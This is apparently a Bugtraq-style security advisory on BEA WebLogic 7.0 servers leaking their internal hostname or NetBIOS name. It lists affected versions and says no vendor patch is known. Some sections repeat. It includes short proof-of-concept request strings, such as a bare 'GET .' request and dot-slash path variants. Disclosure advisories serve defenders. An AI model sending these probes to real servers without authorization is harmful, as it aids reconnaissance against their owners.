BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
BID:7257
Info
BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
| Bugtraq ID: | 7257 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 02 2003 12:00AM |
| Updated: | Apr 02 2003 12:00AM |
| Credit: | Discovery credited to Michael Hendrickx <[email protected]>. |
| Vulnerable: |
BEA Systems WebLogic Server for Win32 7.0 .0.1 SP 1 BEA Systems WebLogic Server for Win32 7.0 .0.1 BEA Systems WebLogic Server for Win32 7.0 SP 1 BEA Systems WebLogic Server for Win32 7.0 BEA Systems Weblogic Server 7.0 .0.1 SP 2 BEA Systems Weblogic Server 7.0 .0.1 SP 1 BEA Systems Weblogic Server 7.0 .0.1 BEA Systems Weblogic Server 7.0 SP 2 BEA Systems Weblogic Server 7.0 SP 1 BEA Systems Weblogic Server 7.0 BEA Systems WebLogic Express for Win32 7.0 .0.1 SP 1 BEA Systems WebLogic Express for Win32 7.0 .0.1 BEA Systems WebLogic Express for Win32 7.0 SP 1 BEA Systems WebLogic Express for Win32 7.0 BEA Systems WebLogic Express 7.0 .0.1 SP 2 BEA Systems WebLogic Express 7.0 .0.1 SP 1 BEA Systems WebLogic Express 7.0 .0.1 BEA Systems WebLogic Express 7.0 SP 2 BEA Systems WebLogic Express 7.0 SP 1 BEA Systems WebLogic Express 7.0 |
| Not Vulnerable: | |
Exploit / POC
BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
No exploit is required for this vulnerability.
The following proof of concept examples have been made available:
GET . HTTP/1.0\r\n\r\n
And also:
./
.//
.//////////////
.%20
.%20%20
..
No exploit is required for this vulnerability.
The following proof of concept examples have been made available:
GET . HTTP/1.0\r\n\r\n
And also:
./
.//
.//////////////
.%20
.%20%20
..
Solution / Fix
BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
References:
References:
- Weblogic (BEA Systems)
- BEA WebLogic internal hostname disclosure (Michael Hendrickx
) - Re: BEA WebLogic internal hostname disclosure ("Kurt Seifried"
)